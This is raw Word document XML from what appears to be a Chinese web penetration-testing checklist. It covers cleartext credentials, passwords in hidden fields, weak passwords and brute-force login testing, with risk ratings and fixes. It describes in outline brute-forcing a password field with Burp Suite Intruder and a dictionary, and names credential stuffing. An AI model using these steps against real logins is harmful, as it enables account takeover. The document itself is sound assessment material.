    <w:p w14:paraId="258F5079" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00757422" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06CC3640" w14:textId="58BE001F" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00C24790" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0054599E" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通过在局域网中嗅探网络流量，获取明文传输的认证凭证，如用户名密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6349D7FA"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF8626" w14:textId="07D1A1C5" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00AC14EC" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：隐藏域中存在密码等信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA2663" w14:textId="312517FD" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00691210" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止在前端页面中保存密码等</w:t>
      </w:r>
      <w:r w:rsidR="00893B35" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感</w:t>
      </w:r>
      <w:r w:rsidR="00691210" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidR="00691210" w:rsidRPr="00656235">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B970A8F" w14:textId="3FC30EE6" w:rsidR="00DF1D95" w:rsidRPr="00F757E4" w:rsidRDefault="00DF1D95" w:rsidP="00D34D4A">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347EA24" w14:textId="1C8286F9" w:rsidR="00757422" w:rsidRPr="00337603" w:rsidRDefault="00594DBB" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc498434493"/>
      <w:r w:rsidRPr="00337603">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证信息猜解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="34FA1342" w14:textId="69387CF8" w:rsidR="00757422" w:rsidRPr="00A82BA3" w:rsidRDefault="00D03834" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc498434494"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在弱口令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="36168C08" w14:textId="05C7EA76"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="006F0D9B" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证登录环节存在弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06E740"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E23BA6" w14:textId="2D740238" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="006F0D9B" w:rsidP="00D34D4A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到网站登录页面，尝试输入常见弱口令</w:t>
      </w:r>
      <w:r w:rsidR="0023662D" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA8EC5" w14:textId="4CC5242A" w:rsidR="0023662D" w:rsidRPr="00D34D4A" w:rsidRDefault="0023662D" w:rsidP="00D34D4A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据网站所使用的第三方组件，寻找特定的弱口令或默认口令进行登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459BBB46" w14:textId="5E56C0F6" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00C24790" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00B4757B" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用互联网公开的常见弱口令尝试登录管理后台，对网站造成一定的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C5841"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118277B4" w14:textId="207B2DBE" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00A40089" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D34AA" w14:textId="32D73412" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00E000D6" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止使用弱口令，口令应满足一定</w:t>
      </w:r>
      <w:r w:rsidR="00CF03E9" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00E000D6" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复杂度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F5ACE" w14:textId="23241C2B" w:rsidR="00DF1D95" w:rsidRPr="00D34D4A" w:rsidRDefault="00DF1D95" w:rsidP="00D34D4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16E6CF9" w14:textId="0892A610" w:rsidR="00757422" w:rsidRPr="00A82BA3" w:rsidRDefault="00D03834" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc498434495"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>存在暴力破解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="42BDEB2E" w14:textId="6893C978" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00757422" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00C331C5" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解的基本思想是根据题目的部分条件确定答案的大致范围，并在此范围内对所有可能的情况逐一验证，直到全部情况验证完毕。若某个情况验证符合题目的全部条件，则为本问题的一个解；若全部情况验证后都不符合题目的全部条件，则本题无解。常常存在于网站的登录系统中，通过对已知的管理员用户名，进行对其登录口令的大量尝试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF40BC2"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFBB8F3" w14:textId="77777777" w:rsidR="00C331C5" w:rsidRPr="00D34D4A" w:rsidRDefault="00C331C5" w:rsidP="00D34D4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到网站登录页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F30531" w14:textId="77777777" w:rsidR="00C331C5" w:rsidRPr="00D34D4A" w:rsidRDefault="00C331C5" w:rsidP="00D34D4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对登录页面进行抓包，将其发送到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Intruder,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并设置其密码参数，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwd=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为变量，添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（字典），进行攻击，攻击过程中查看其返回的字节长度，来判断是否成功。攻击效果如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F73CA92" w14:textId="05777B62" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00C331C5" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="378C49E5" wp14:editId="713B2268">
            <wp:extent cx="3975100" cy="13335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1333500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4106AA90"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一般情况下，暴力破解有三种形式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA2DAE"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1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>固定账号对密码暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62473E1B"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2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在得知账号具有规律性，或者通过某种方式获取到大量账号的前提下，固定密码对账号暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6226801A"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3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用网上流传的账号密码库进行撞库攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF5A41" w14:textId="4794A2F9" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00C24790" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F9348F" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者一般会使用自动化脚本组合出常见的用户名和密码，即字典，再结合软件</w:t>
      </w:r>
      <w:r w:rsidR="00F9348F" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00F9348F" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00F9348F" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intruder</w:t>
      </w:r>
      <w:r w:rsidR="00F9348F" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能进行暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C63394"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB55E93" w14:textId="20C73FF3" w:rsidR="00757422" w:rsidRPr="00D34D4A" w:rsidRDefault="00F9348F" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在暴力破解风险，但未暴破出密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17981E47" w14:textId="77777777" w:rsidR="00D61DBD" w:rsidRPr="00D34D4A" w:rsidRDefault="00757422" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00D61DBD" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止暴力攻击的一些方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE3567"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账户锁定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE37F52"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账户锁定是很有效的方法，因为暴力破解程序在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5-6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次的探测中猜出密码的可能性很小。但是同时也拒绝了正常用户的使用。如果攻击者的探测是建立在用户名探测成功之后的行为，那么会造成严重的拒绝服务攻击。对于对大量用户名只用一个密码的探测攻击账户锁定无效。如果对已经锁定的账户并不返回任何信息，可能迷惑攻击者。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18982A88"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返回信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A470A9"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如果不管结果如何都返回成功的信息，破解软件就会停止攻击。但是对人来说很快就会被识破。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F82C149"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页面跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363DE8B5"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产生登录错的的时候就跳到另一个页面要求重新登录。比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>126</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和校内网都是这样做的。局限性在于不能总是跳转页面，一般只在第一次错误的时候跳转，但是第一次之后又可以继续暴力探测了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001543C5"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适当的延时</w:t>
      </w:r>
    </w:p>
